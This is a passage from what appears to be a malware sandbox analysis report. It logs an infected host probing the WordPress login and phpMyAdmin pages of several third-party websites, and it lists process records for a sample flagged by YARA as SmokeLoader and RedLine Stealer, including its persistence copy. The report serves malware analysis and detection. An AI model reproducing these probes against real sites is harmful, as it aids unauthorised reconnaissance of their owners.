.add('menu_resizer.js', 1) .add('cross_framing_protection.js', 0) .add('messages.php', 0) .add('config.

Session ID	Source IP	Source Port	Destination IP	Destination Port
333	192.168.2.6	60761	13.232.255.130	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:24 UTC	181	OUT	GET /wp-login.php HTTP/1.1 Host: amsantechnology.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:25 UTC	375	IN	HTTP/1.1 200 OK Date: Tue, 20 Feb 2024 23:26:25 GMT Server: Apache Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 X-Frame-Options: SAMEORIGIN Set-Cookie: wordpress_test_cookie=WP%20Cookie%20check; path=/; secure Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
2024-02-20 23:26:25 UTC	6192	IN	Data Raw: 31 38 32 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 09 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 4c 6f 67 20 49 6e 20 26 6c 73 61 71 75 6f 3b 20 41 6d 73 61 6e 20 54 65 63 68 6e 6f 6c 6f 67 79 20 26 23 38 32 31 32 3b 20 57 6f 72 64 50 72 65 73 73 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 Data Ascii: 1823<!DOCTYPE html><html lang="en-US"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><title>Log In &lsaquo; Amsan Technology — WordPress</title><meta name='robots' content='noindex, follow' /><link rel='style

Session ID	Source IP	Source Port	Destination IP	Destination Port
334	192.168.2.6	60889	86.105.245.69	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:25 UTC	216	OUT	GET / HTTP/1.1 Host: www.stylesense.co.uk Accept: / Accept-Encoding: deflate, gzip Cookie: PHPSESSID=q2ph1u7ied1kb5jksttv46bm67 User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:25 UTC	360	IN	HTTP/1.1 301 Moved Permanently Server: openresty/1.21.4.1 Date: Tue, 20 Feb 2024 23:26:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Location: https://sell.sawbrokers.com/domain/stylesense.co.uk/
2024-02-20 23:26:25 UTC	13	IN	Data Raw: 33 0d 0a 20 20 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 3 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
335	192.168.2.6	60902	81.169.145.86	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:25 UTC	194	OUT	GET /phpMyAdmin/ HTTP/1.1 Host: www.creativ-moebelwerkstaetten.de Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:28 UTC	391	IN	HTTP/1.1 404 Not Found Date: Tue, 20 Feb 2024 23:26:25 GMT Server: Apache/2.4.58 (Unix) X-Powered-By: PHP/8.2.15 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: private, must-revalidate Link: <https://www.creativ-moebelwerkstaetten.de/wp-json/>; rel="https://api.w.org/" Vary: User-Agent Content-Type: text/html; charset=UTF-8 Connection: close Transfer-Encoding: chunked
2024-02-20 23:26:28 UTC	7801	IN	Data Raw: 32 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 61 76 61 64 61 2d 68 74 6d 6c 2d 6c 61 79 6f 75 74 2d 77 69 64 65 20 61 76 61 64 61 2d 68 74 6d 6c 2d 68 65 61 64 65 72 2d 70 6f 73 69 74 69 6f 6e 2d 74 6f 70 22 20 6c 61 6e 67 3d 22 64 65 2d 44 45 22 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 20 66 62 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 2f 66 62 23 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 Data Ascii: 2000<!DOCTYPE html><html class="avada-html-layout-wide avada-html-header-position-top" lang="de-DE" prefix="og: http://ogp.me/ns# fb: http://ogp.me/ns/fb#"><head><meta http-equiv="X-UA-Compatible" content="IE=edge" /><meta http-equiv="Content-Type
2024-02-20 23:26:28 UTC	397	IN	Data Raw: 32 2e 36 37 2d 37 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 72 65 61 74 69 76 2d 6d 6f 65 62 65 6c 77 65 72 6b 73 74 61 65 74 74 65 6e 2e 64 65 2f 77 70 2d 69 6e 63 6c 75 64 65 73 2f 6a 73 2f 6a 71 75 65 72 79 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 33 2e 37 2e 31 22 20 69 64 3d 22 6a 71 75 65 72 79 2d 63 6f 72 65 2d 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 72 65 61 74 69 76 2d 6d 6f 65 62 65 Data Ascii: 2.67-7' type='text/css' media='all' /><script type="text/javascript" src="https://www.creativ-moebelwerkstaetten.de/wp-includes/js/jquery/jquery.min.js?ver=3.7.1" id="jquery-core-js"></script><script type="text/javascript" src="https://www.creativ-moebe
2024-02-20 23:26:28 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2024-02-20 23:26:28 UTC	8192	IN	Data Raw: 32 30 30 30 0d 0a 74 74 70 73 3a 2f 2f 77 77 77 2e 63 72 65 61 74 69 76 2d 6d 6f 65 62 65 6c 77 65 72 6b 73 74 61 65 74 74 65 6e 2e 64 65 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 72 65 76 73 6c 69 64 65 72 2f 70 75 62 6c 69 63 2f 61 73 73 65 74 73 2f 6a 73 2f 72 62 74 6f 6f 6c 73 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 36 2e 32 30 22 20 69 64 3d 22 74 70 2d 74 6f 6f 6c 73 2d 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 72 65 61 74 69 76 2d 6d 6f 65 62 65 6c 77 65 72 6b 73 74 61 65 74 74 65 6e 2e 64 65 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 72 65 76 73 6c 69 64 65 72 2f 70 Data Ascii: 2000ttps://www.creativ-moebelwerkstaetten.de/wp-content/plugins/revslider/public/assets/js/rbtools.min.js?ver=6.6.20" id="tp-tools-js"></script><script type="text/javascript" src="https://www.creativ-moebelwerkstaetten.de/wp-content/plugins/revslider/p
2024-02-20 23:26:28 UTC	6	IN	Data Raw: 6f 6e 74 2d 66 61 Data Ascii: ont-fa
2024-02-20 23:26:28 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2024-02-20 23:26:28 UTC	6282	IN	Data Raw: 31 38 38 32 0d 0a 63 65 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 4d 6f 6e 74 73 65 72 72 61 74 27 3b 0a 20 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 69 74 61 6c 69 63 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 34 30 30 3b 0a 20 20 73 72 63 3a 20 75 72 6c 28 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 72 65 61 74 69 76 2d 6d 6f 65 62 65 6c 77 65 72 6b 73 74 61 65 74 74 65 6e 2e 64 65 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 66 75 73 69 6f 6e 2d 67 66 6f 6e 74 73 2f 4a 54 55 51 6a 49 67 31 5f 69 36 74 38 6b 43 48 4b 6d 34 35 39 57 78 52 78 69 37 6d 77 39 63 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 27 29 3b 0a 20 20 75 6e 69 63 6f 64 65 2d 72 61 6e 67 65 3a 20 55 2b 30 31 30 32 2d 30 31 30 33 2c 20 55 Data Ascii: 1882ce { font-family: 'Montserrat'; font-style: italic; font-weight: 400; src: url(https://www.creativ-moebelwerkstaetten.de/wp-content/uploads/fusion-gfonts/JTUQjIg1_i6t8kCHKm459WxRxi7mw9c.woff2) format('woff2'); unicode-range: U+0102-0103, U
2024-02-20 23:26:28 UTC	8192	IN	Data Raw: 37 37 65 0d 0a 72 6d 61 74 28 27 77 6f 66 66 32 27 29 3b 0a 20 20 75 6e 69 63 6f 64 65 2d 72 61 6e 67 65 3a 20 55 2b 30 31 30 30 2d 30 32 41 46 2c 20 55 2b 30 33 30 34 2c 20 55 2b 30 33 30 38 2c 20 55 2b 30 33 32 39 2c 20 55 2b 31 45 30 30 2d 31 45 39 46 2c 20 55 2b 31 45 46 32 2d 31 45 46 46 2c 20 55 2b 32 30 32 30 2c 20 55 2b 32 30 41 30 2d 32 30 41 42 2c 20 55 2b 32 30 41 44 2d 32 30 43 30 2c 20 55 2b 32 31 31 33 2c 20 55 2b 32 43 36 30 2d 32 43 37 46 2c 20 55 2b 41 37 32 30 2d 41 37 46 46 3b 0a 7d 0a 2f 2a 20 6c 61 74 69 6e 20 2a 2f 0a 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 4d 6f 6e 74 73 65 72 72 61 74 27 3b 0a 20 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 66 6f 6e 74 2d 77 65 Data Ascii: 77ermat('woff2'); unicode-range: U+0100-02AF, U+0304, U+0308, U+0329, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face { font-family: 'Montserrat'; font-style: normal; font-we
2024-02-20 23:26:28 UTC	1931	IN	Data Raw: 74 65 6e 2e 64 65 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 66 75 73 69 6f 6e 2d 67 66 6f 6e 74 73 2f 31 50 74 75 67 38 7a 59 53 5f 53 4b 67 67 50 4e 79 43 41 49 54 35 6c 75 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 27 29 3b 0a 20 20 75 6e 69 63 6f 64 65 2d 72 61 6e 67 65 3a 20 55 2b 30 34 36 30 2d 30 35 32 46 2c 20 55 2b 31 43 38 30 2d 31 43 38 38 2c 20 55 2b 32 30 42 34 2c 20 55 2b 32 44 45 30 2d 32 44 46 46 2c 20 55 2b 41 36 34 30 2d 41 36 39 46 2c 20 55 2b 46 45 32 45 2d 46 45 32 46 3b 0a 7d 0a 2f 2a 20 63 79 72 69 6c 6c 69 63 20 2a 2f 0a 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 52 61 6c 65 77 61 79 27 3b 0a 20 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c Data Ascii: ten.de/wp-content/uploads/fusion-gfonts/1Ptug8zYS_SKggPNyCAIT5lu.woff2) format('woff2'); unicode-range: U+0460-052F, U+1C80-1C88, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face { font-family: 'Raleway'; font-style: normal
2024-02-20 23:26:28 UTC	2	IN	Data Raw: 0d 0a Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port
336	192.168.2.6	60932	162.0.235.125	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:25 UTC	183	OUT	GET /wp-login.php HTTP/1.1 Host: norwegischlernen.info Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:25 UTC	408	IN	HTTP/1.1 200 OK keep-alive: timeout=5, max=100 expires: Wed, 11 Jan 1984 05:00:00 GMT cache-control: no-cache, must-revalidate, max-age=0 content-type: text/html; charset=UTF-8 set-cookie: wordpress_test_cookie=WP+Cookie+check; path=/; secure x-frame-options: SAMEORIGIN content-length: 5377 date: Tue, 20 Feb 2024 23:26:25 GMT server: LiteSpeed x-turbo-charged-by: LiteSpeed connection: close
2024-02-20 23:26:25 UTC	5377	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 09 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 4c 6f 67 20 49 6e 20 26 6c 73 61 71 75 6f 3b 20 6e 6f 72 77 65 67 69 73 63 68 6c 65 72 6e 65 6e 2e 69 6e 66 6f 20 26 23 38 32 31 32 3b 20 57 6f 72 64 50 72 65 73 73 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 2c 20 6e 6f 69 6e 64 65 78 2c 20 6e 6f 61 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><title>Log In &lsaquo; norwegischlernen.info — WordPress</title><meta name='robots' content='max-image-preview:large, noindex, noa

Session ID	Source IP	Source Port	Destination IP	Destination Port
337	192.168.2.6	61045	104.21.54.169	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:25 UTC	185	OUT	GET /wp-login.php HTTP/1.1 Host: fortressrealcapital.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:25 UTC	804	IN	HTTP/1.1 200 OK Date: Tue, 20 Feb 2024 23:26:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 x-frame-options: SAMEORIGIN set-cookie: wordpress_test_cookie=WP%20Cookie%20check; path=/; secure vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=47visTOVu7y8qYpJpNErDimqwO7SZgnGdF1skoRODL3gfkB8DsStUK%2BOK6GhN0uq8r6zKqw0oj%2FXmgArfa%2BJyfq5eYKGs9HYVa123Zj2xqf7LNNkmxSF6JLqi3ZV3RokwgTJwh881arp0Q%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 858a83b19afd41ba-EWR alt-svc: h3=":443"; ma=86400
2024-02-20 23:26:25 UTC	565	IN	Data Raw: 31 61 30 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 09 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 4c 6f 67 20 49 6e 20 26 6c 73 61 71 75 6f 3b 20 46 6f 72 74 72 65 73 73 20 52 65 61 6c 20 43 61 70 69 74 61 6c 20 26 23 38 32 31 32 3b 20 57 6f 72 64 50 72 65 73 73 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 Data Ascii: 1a04<!DOCTYPE html><html lang="en-US"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><title>Log In &lsaquo; Fortress Real Capital — WordPress</title><meta name='robots' content='noindex, follow' /><link rel='
2024-02-20 23:26:25 UTC	1369	IN	Data Raw: 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 66 6f 72 6d 73 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 72 74 72 65 73 73 72 65 61 6c 63 61 70 69 74 61 6c 2e 63 6f 6d 2f 77 70 2d 61 64 6d 69 6e 2f 63 73 73 2f 66 6f 72 6d 73 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 36 2e 34 2e 33 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 6c 31 30 6e 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 72 74 72 65 73 73 72 65 61 6c 63 61 70 69 74 61 6c 2e 63 6f 6d 2f 77 70 2d 61 64 6d 69 6e 2f 63 73 73 2f 6c 31 30 6e 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 36 2e 34 2e 33 27 20 74 79 70 65 3d 27 74 65 78 74 2f Data Ascii: ylesheet' id='forms-css' href='https://fortressrealcapital.com/wp-admin/css/forms.min.css?ver=6.4.3' type='text/css' media='all' /><link rel='stylesheet' id='l10n-css' href='https://fortressrealcapital.com/wp-admin/css/l10n.min.css?ver=6.4.3' type='text/
2024-02-20 23:26:25 UTC	1369	IN	Data Raw: 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 6f 72 64 70 72 65 73 73 2e 6f 72 67 2f 22 3e 50 6f 77 65 72 65 64 20 62 79 20 57 6f 72 64 50 72 65 73 73 3c 2f 61 3e 3c 2f 68 31 3e 0a 09 0a 09 09 3c 66 6f 72 6d 20 6e 61 6d 65 3d 22 6c 6f 67 69 6e 66 6f 72 6d 22 20 69 64 3d 22 6c 6f 67 69 6e 66 6f 72 6d 22 20 61 63 74 69 6f 6e 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 72 74 72 65 73 73 72 65 61 6c 63 61 70 69 74 61 6c 2e 63 6f 6d 2f 77 70 2d 6c 6f 67 69 6e 2e 70 68 70 22 20 6d 65 74 68 6f 64 3d 22 70 6f 73 74 22 3e 0a 09 09 09 3c 70 3e 0a 09 09 09 09 3c 6c 61 62 65 6c 20 66 6f 72 3d 22 75 73 65 72 5f 6c 6f 67 69 6e 22 3e 55 73 65 72 6e 61 6d 65 20 6f 72 20 45 6d 61 69 6c 20 41 64 64 72 65 73 73 3c 2f 6c 61 62 65 6c 3e 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 Data Ascii: ef="https://wordpress.org/">Powered by WordPress</a></h1><form name="loginform" id="loginform" action="https://fortressrealcapital.com/wp-login.php" method="post"><p><label for="user_login">Username or Email Address</label><input type="
2024-02-20 23:26:25 UTC	1369	IN	Data Raw: 22 20 2f 3e 0a 09 09 09 3c 2f 70 3e 0a 09 09 3c 2f 66 6f 72 6d 3e 0a 0a 09 09 09 09 09 3c 70 20 69 64 3d 22 6e 61 76 22 3e 0a 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 77 70 2d 6c 6f 67 69 6e 2d 6c 6f 73 74 2d 70 61 73 73 77 6f 72 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 72 74 72 65 73 73 72 65 61 6c 63 61 70 69 74 61 6c 2e 63 6f 6d 2f 77 70 2d 6c 6f 67 69 6e 2e 70 68 70 3f 61 63 74 69 6f 6e 3d 6c 6f 73 74 70 61 73 73 77 6f 72 64 22 3e 4c 6f 73 74 20 79 6f 75 72 20 70 61 73 73 77 6f 72 64 3f 3c 2f 61 3e 09 09 09 3c 2f 70 3e 0a 09 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 2f 2a 20 3c 21 5b 43 44 41 54 41 5b 20 2a 2f 0a 66 75 6e 63 74 69 6f 6e 20 77 70 5f 61 74 74 65 6d 70 74 5f 66 Data Ascii: " /></p></form><p id="nav"><a class="wp-login-lost-password" href="https://fortressrealcapital.com/wp-login.php?action=lostpassword">Lost your password?</a></p><script type="text/javascript">/* <![CDATA[ */function wp_attempt_f
2024-02-20 23:26:25 UTC	1369	IN	Data Raw: 32 22 20 69 64 3d 22 77 70 2d 70 6f 6c 79 66 69 6c 6c 2d 69 6e 65 72 74 2d 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 72 74 72 65 73 73 72 65 61 6c 63 61 70 69 74 61 6c 2e 63 6f 6d 2f 77 70 2d 69 6e 63 6c 75 64 65 73 2f 6a 73 2f 64 69 73 74 2f 76 65 6e 64 6f 72 2f 72 65 67 65 6e 65 72 61 74 6f 72 2d 72 75 6e 74 69 6d 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 30 2e 31 34 2e 30 22 20 69 64 3d 22 72 65 67 65 6e 65 72 61 74 6f 72 2d 72 75 6e 74 69 6d 65 2d 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f Data Ascii: 2" id="wp-polyfill-inert-js"></script><script type="text/javascript" src="https://fortressrealcapital.com/wp-includes/js/dist/vendor/regenerator-runtime.min.js?ver=0.14.0" id="regenerator-runtime-js"></script><script type="text/javascript" src="https://
2024-02-20 23:26:25 UTC	627	IN	Data Raw: 72 65 2d 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 69 64 3d 22 77 70 2d 75 74 69 6c 2d 6a 73 2d 65 78 74 72 61 22 3e 0a 2f 2a 20 3c 21 5b 43 44 41 54 41 5b 20 2a 2f 0a 76 61 72 20 5f 77 70 55 74 69 6c 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 61 6a 61 78 22 3a 7b 22 75 72 6c 22 3a 22 5c 2f 77 70 2d 61 64 6d 69 6e 5c 2f 61 64 6d 69 6e 2d 61 6a 61 78 2e 70 68 70 22 7d 7d 3b 0a 2f 2a 20 5d 5d 3e 20 2a 2f 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 72 74 72 65 73 73 72 65 61 6c 63 61 70 69 74 61 6c 2e 63 6f 6d 2f 77 70 2d 69 6e 63 6c 75 64 65 73 Data Ascii: re-js"></script><script type="text/javascript" id="wp-util-js-extra">/* <![CDATA[ /var _wpUtilSettings = {"ajax":{"url":"\/wp-admin\/admin-ajax.php"}};/ ... */</script><script type="text/javascript" src="https://fortressrealcapital.com/wp-includes
2024-02-20 23:26:25 UTC	7	IN	Data Raw: 32 0d 0a 0a 09 0d 0a Data Ascii: 2
2024-02-20 23:26:25 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	00:21:57
Start date:	21/02/2024
Path:	C:\Users\user\Desktop\MCYq2AqNU0.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\MCYq2AqNU0.exe
Imagebase:	0x400000
File size:	144'384 bytes
MD5 hash:	514F0B1D15418DCC5785C2F6CA4A0658
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.2139812917.0000000000AA0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.2140044524.0000000002460000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.2140044524.0000000002460000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.2140105329.0000000002481000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.2140105329.0000000002481000.00000004.10000000.00040000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.2139919357.0000000000ACD000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Target ID:	2
Start time:	00:22:03
Start date:	21/02/2024
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff609140000
File size:	5'141'208 bytes
MD5 hash:	662F4F92FDE3557E86D110526BB578D5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Target ID:	6
Start time:	00:22:23
Start date:	21/02/2024
Path:	C:\Users\user\AppData\Roaming\ccjteug
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\ccjteug
Imagebase:	0x400000
File size:	144'384 bytes
MD5 hash:	514F0B1D15418DCC5785C2F6CA4A0658
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000006.00000002.2456314399.0000000000850000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000006.00000002.2456314399.0000000000850000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000006.00000002.2456240672.0000000000840000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000006.00000002.2457679800.0000000002471000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000006.00000002.2457679800.0000000002471000.00000004.10000000.00040000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 